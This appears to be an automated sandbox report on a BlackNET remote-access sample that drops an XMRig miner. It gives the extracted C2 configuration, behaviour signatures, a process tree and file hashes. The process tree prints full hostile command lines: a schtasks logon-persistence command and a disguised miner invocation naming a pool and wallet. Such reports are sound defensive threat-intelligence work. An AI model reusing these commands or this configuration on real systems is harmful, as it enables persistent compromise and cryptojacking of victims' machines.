Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    23-07-2021 00:06

General

  • Target

    4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe

  • Size

    3.2MB

  • MD5

    af711c6269728cc41a4b6cab99dc00d2

  • SHA1

    02a1cff69f43552c5aa6fea7547e5f68018dbc84

  • SHA256

    4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c

  • SHA512

    94b6ba8fcdbb5dd175096e305698a41078fb1a99725610bb49159d02ccf2484b01fd7bfcf48fb4644af6b92c77453855f7eba46445f93ff449317f25613bb8a6

Malware Config

Extracted

Family

blacknet

Version

v3.7.0 Public

Botnet

OTwjgZ

C2

http://54.237.66.139

Mutex

BN[a4bfa882efc194e2bcd370ea]

Attributes
  • antivm

    false

  • elevate_uac

    false

  • install_name

    WindowsUpdate.exe

  • splitter

    |BN|

  • start_name

    19eb68018edbdeae69b26450d3d0915f

  • startup

    false

  • usb_spread

    false

Signatures

  • BlackNET

    BlackNET is an open source remote access tool written in VB.NET.

  • BlackNET Payload 6 IoCs
  • Contains code to disable Windows Defender 6 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 5 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe
    "C:\Users\Admin\AppData\Local\Temp\4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "{path}"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:792
      • C:\Users\Admin\AppData\Local\Temp\phone.exe
        "C:\Users\Admin\AppData\Local\Temp\phone.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:1524
      • C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe
        "C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:880
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1984
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:1992
        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
          4⤵
          • Executes dropped EXE
          PID:1972
        • C:\Users\Admin\AppData\Roaming\userupdate.exe
          "C:\Users\Admin\AppData\Roaming\userupdate.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1576
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1140
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"'
              6⤵
              • Creates scheduled task(s)
              PID:1104
          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
            5⤵
            • Executes dropped EXE
            PID:876
          • C:\Windows\System32\cmd.exe
            C:\Windows/System32\cmd.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.c3pool.com:13333 --user=439KJy5uZoHFetfkQ45pdjRnjLzN1TsFn2NLxPcZbTMwTqJGGpJw4SEM4NhUygc7xacM16VKBNq2Hfe52KmiWTpE46UsCLH --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
            5⤵
            • Blocklisted process makes network request
            • Suspicious use of AdjustPrivilegeToken
            PID:1700

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scripting

1
T1064

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Scripting

1
T1064

Discovery

System Information Discovery

1
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\phone.exe
    MD5

    a18b7cb1fe97912ffc3e38d76ccc0462

    SHA1

    c5908c111223d69f532973643381983ba385c1c1

    SHA256

    2d5e2831e24496bd74a7a2317f824657905cdadaeb00f5c6e33e9b75c5231a2f

    SHA512

    d92025f6eb3ab4a594113813284361694ce1b78cfd513d88f4ea842ea7d37c91976066b33089c4da048e39cc4c65654637d2a14138327df40f89d4bb0963be1c

  • C:\Users\Admin\AppData\Local\Temp\phone.exe
    MD5

    a18b7cb1fe97912ffc3e38d76ccc0462

    SHA1

    c5908c111223d69f532973643381983ba385c1c1

    SHA256

    2d5e2831e24496bd74a7a2317f824657905cdadaeb00f5c6e33e9b75c5231a2f

    SHA512

    d92025f6eb3ab4a594113813284361694ce1b78cfd513d88f4ea842ea7d37c91976066b33089c4da048e39cc4c65654637d2a14138327df40f89d4bb0963be1c

  • C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe
    MD5

    c169f9a4c5c32e4ceb4ff58d1c86e969

    SHA1

    8cdad283c3c44202cb3dc50928d8f80ce885715c

    SHA256

    aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

    SHA512

    3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

  • C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe
    MD5

    c169f9a4c5c32e4ceb4ff58d1c86e969

    SHA1

    8cdad283c3c44202cb3dc50928d8f80ce885715c

    SHA256

    aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

    SHA512

    3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
    MD5

    0c0195c48b6b8582fa6f6373032118da

    SHA1

    d25340ae8e92a6d29f599fef426a2bc1b5217299

    SHA256

    11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

    SHA512

    ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    94de80b9dbb3379c59a370b83bbffd90

    SHA1

    9b65d5fba13c1174af142de9fdb17cd9989332fc

    SHA256

    5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

    SHA512

    1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    94de80b9dbb3379c59a370b83bbffd90

    SHA1

    9b65d5fba13c1174af142de9fdb17cd9989332fc

    SHA256

    5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

    SHA512

    1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    94de80b9dbb3379c59a370b83bbffd90

    SHA1

    9b65d5fba13c1174af142de9fdb17cd9989332fc

    SHA256

    5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

    SHA512

    1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    94de80b9dbb3379c59a370b83bbffd90

    SHA1

    9b65d5fba13c1174af142de9fdb17cd9989332fc

    SHA256

    5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

    SHA512

    1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

  • C:\Users\Admin\AppData\Roaming\userupdate.exe
    MD5

    c169f9a4c5c32e4ceb4ff58d1c86e969

    SHA1

    8cdad283c3c44202cb3dc50928d8f80ce885715c

    SHA256

    aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

    SHA512

    3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

  • C:\Users\Admin\AppData\Roaming\userupdate.exe
    MD5

    c169f9a4c5c32e4ceb4ff58d1c86e969

    SHA1

    8cdad283c3c44202cb3dc50928d8f80ce885715c

    SHA256

    aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

    SHA512

    3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

  • \Users\Admin\AppData\Local\Temp\phone.exe
    MD5

    a18b7cb1fe97912ffc3e38d76ccc0462

    SHA1

    c5908c111223d69f532973643381983ba385c1c1

    SHA256

    2d5e2831e24496bd74a7a2317f824657905cdadaeb00f5c6e33e9b75c5231a2f

    SHA512

    d92025f6eb3ab4a594113813284361694ce1b78cfd513d88f4ea842ea7d37c91976066b33089c4da048e39cc4c65654637d2a14138327df40f89d4bb0963be1c

  • \Users\Admin\AppData\Local\Temp\phoneupdate.exe
    MD5

    c169f9a4c5c32e4ceb4ff58d1c86e969

    SHA1

    8cdad283c3c44202cb3dc50928d8f80ce885715c

    SHA256

    aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

    SHA512

    3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

  • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    94de80b9dbb3379c59a370b83bbffd90

    SHA1

    9b65d5fba13c1174af142de9fdb17cd9989332fc

    SHA256

    5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

    SHA512

    1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

  • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    94de80b9dbb3379c59a370b83bbffd90

    SHA1

    9b65d5fba13c1174af142de9fdb17cd9989332fc

    SHA256

    5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

    SHA512

    1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

  • \Users\Admin\AppData\Roaming\userupdate.exe
    MD5

    c169f9a4c5c32e4ceb4ff58d1c86e969

    SHA1

    8cdad283c3c44202cb3dc50928d8f80ce885715c

    SHA256

    aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

    SHA512

    3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

  • memory/792-69-0x0000000005300000-0x0000000005301000-memory.dmp
    Filesize

    4KB

  • memory/792-67-0x0000000000400000-0x000000000063C000-memory.dmp
    Filesize

    2.2MB

  • memory/792-66-0x000000000063636E-mapping.dmp
  • memory/792-65-0x0000000000400000-0x000000000063C000-memory.dmp
    Filesize

    2.2MB

  • memory/876-124-0x000000001AE80000-0x000000001AE82000-memory.dmp
    Filesize

    8KB

  • memory/876-113-0x000000013FC10000-0x000000013FC11000-memory.dmp
    Filesize

    4KB

  • memory/876-109-0x0000000000000000-mapping.dmp
  • memory/880-87-0x0000000002370000-0x0000000002372000-memory.dmp
    Filesize

    8KB

  • memory/880-86-0x000000001C3B0000-0x000000001C5CB000-memory.dmp
    Filesize

    2.1MB

  • memory/880-75-0x0000000000000000-mapping.dmp
  • memory/880-79-0x000000013FD00000-0x000000013FD01000-memory.dmp
    Filesize

    4KB

  • memory/1104-107-0x0000000000000000-mapping.dmp
  • memory/1140-106-0x0000000000000000-mapping.dmp
  • memory/1268-62-0x0000000000590000-0x0000000000592000-memory.dmp
    Filesize

    8KB

  • memory/1268-59-0x0000000000190000-0x0000000000191000-memory.dmp
    Filesize

    4KB

  • memory/1268-61-0x0000000007540000-0x0000000007541000-memory.dmp
    Filesize

    4KB

  • memory/1268-63-0x0000000005EA0000-0x0000000006136000-memory.dmp
    Filesize

    2.6MB

  • memory/1268-64-0x00000000065D0000-0x0000000006814000-memory.dmp
    Filesize

    2.3MB

  • memory/1524-85-0x000000001B489000-0x000000001B4A8000-memory.dmp
    Filesize

    124KB

  • memory/1524-78-0x0000000000FE0000-0x0000000000FE1000-memory.dmp
    Filesize

    4KB

  • memory/1524-71-0x0000000000000000-mapping.dmp
  • memory/1524-83-0x000000001B482000-0x000000001B483000-memory.dmp
    Filesize

    4KB

  • memory/1524-82-0x000000001B480000-0x000000001B482000-memory.dmp
    Filesize

    8KB

  • memory/1524-84-0x000000001B484000-0x000000001B485000-memory.dmp
    Filesize

    4KB

  • memory/1576-100-0x000000013F160000-0x000000013F161000-memory.dmp
    Filesize

    4KB

  • memory/1576-97-0x0000000000000000-mapping.dmp
  • memory/1576-105-0x00000000020C0000-0x00000000020C2000-memory.dmp
    Filesize

    8KB

  • memory/1576-115-0x000000001B250000-0x000000001B25A000-memory.dmp
    Filesize

    40KB

  • memory/1700-120-0x0000000000240000-0x0000000000260000-memory.dmp
    Filesize

    128KB

  • memory/1700-117-0x00000001402EB66C-mapping.dmp
  • memory/1700-116-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/1700-118-0x00000000001E0000-0x0000000000200000-memory.dmp
    Filesize

    128KB

  • memory/1700-119-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/1700-121-0x0000000000240000-0x0000000000260000-memory.dmp
    Filesize

    128KB

  • memory/1700-122-0x0000000000480000-0x00000000004A0000-memory.dmp
    Filesize

    128KB

  • memory/1972-95-0x000000013F3B0000-0x000000013F3B1000-memory.dmp
    Filesize

    4KB

  • memory/1972-102-0x0000000000840000-0x0000000000842000-memory.dmp
    Filesize

    8KB

  • memory/1972-104-0x000000001B9C0000-0x000000001B9C2000-memory.dmp
    Filesize

    8KB

  • memory/1972-91-0x0000000000000000-mapping.dmp
  • memory/1984-88-0x0000000000000000-mapping.dmp
  • memory/1992-89-0x0000000000000000-mapping.dmp